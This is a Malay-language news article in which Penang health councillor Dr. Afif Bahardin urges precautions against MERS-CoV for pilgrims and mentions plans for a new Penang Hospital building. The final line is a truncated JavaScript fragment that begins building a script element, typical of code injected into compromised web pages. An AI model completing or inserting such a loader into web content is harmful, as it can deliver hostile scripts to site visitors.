MERS-CoV, Exco seru orang ramai ambil langkah jaga-jaga

GEORGE TOWN – Sungguhpun tiada sebarang kes Sindrom Pernafasan Virus Korona Timur Tengah atau Middle East Respiratory Syndrome Coronavirus (MERS-CoV) dikesan di Malaysia setakat ini, Exco Pertanian & Industri Asas Tani, Pembangunan Desa dan Kesihatan, Dr. Afif Bahardin menyatakan bahawa Kerajaan Negeri tetap mengambil langkah-langkah sewajarnya bagi memastikan wabak itu tidak menular di sini.

“Kita (Kerajaan Negeri) akan bekerjasama dengan Kementerian Kesihatan Malaysia (KKM) bagi memastikan wabak MERS-CoV tidak menular di negara ini memandangkan negara jiran, Thailand menjadi negara terbaharu melaporkan kes pertama wabak berkenaan baru-baru ini selepas Korea Selatan,” katanya pada sidang media selepas hadir ke Wad Rawatan Jantung, Hospital Pulau Pinang (HPP) bagi mengedarkan kurma kepada pesakit dan kakitangan di sini sempena Ramadan baru-baru ini.

Turut hadir, Ahli Parlimen Bukit Bendera, Zairil Khir Johari, Ahli Dewan Undangan Negeri (ADUN) Pulau Tikus, Yap Soo Huey, Pengarah HPP, Dr. M. Sukumar dan Timbalan Pengarah (Perubatan), Dr. S. Shameni Suna.

Afif dalam pada itu turut menasihati orang ramai terutama bakal jemaah umrah dan haji agar sentiasa mengambil langkah-langkah pencegahan untuk mengelak daripada terkena wabak itu.

“Buat masa ini, pihak Kementerian Kesihatan tidak mengeluarkan sebarang nasihat perjalanan (travel advisory) atau larangan lawatan ke negara-negara terlibat.

“Walau bagaimanapun, sebagai langkah berjaga-jaga, saya ingin menasihatkan supaya selalu mengamalkan tahap kebersihan diri yang tinggi, sentiasa membawa bersama penutup mulut dan hidung (mask) serta bahan pencuci tangan (hand sanitizer) dan elakkan menjamah makanan mentah atau separuh masak terutama semasa dalam tempoh lawatan ke negara terlibat,” seru beliau sambil menasihati mereka yang mengalami gejala demam berlarutan agar segera dapatkan rawatan perubatan di klinik-klinik berhampiran.

Tambah beliau, antara gelaja utama dikesan dalam kalangan kes MERSCoV adalah jangkitan respiratori yang berlaku secara akut dan serius, termasuk demam dan kesukaran bernafas.

“Bagi kebanyakan kes, pesakit akan mengalami radang paru-paru, manakala sebilangan lain mengalami gejala gastrointestinal seperti cirit-birit,” ujar Afif yang turut meluangkan masa selama sejam di Klinik Kesihatan Jalan Perak bagi mengedarkan kurma kepada pesakit dan kakitangan klinik berkenaan.

Dalam perkembangan berasingan, Afif turut memaklumkan kesediaan Kerajaan Negeri untuk bekerjasama dengan KKM bagi membangunkan sebuah bangunan baharu HPP berasingan ekoran kesesakan di bahagian perkhidmatan pesakit luar kini.

“Bangunan baharu yang dicadangkan di Jalan Sepoy Lanes di sini bakal menempatkan wad kanak-kanak dan wanita bagi mengurangkan kesesakan di tapak sedia ada.

“Di peringkat Kerajaan Negeri, kita masih lagi dalam perbincangan tapak dan akan umumkan apabila kata putus dicapai kelak,” jelas beliau yang juga Ahli Dewan Undangan Negeri (ADUN) Seberang Jaya.

var d=document;var s=d.createElement(‘script’);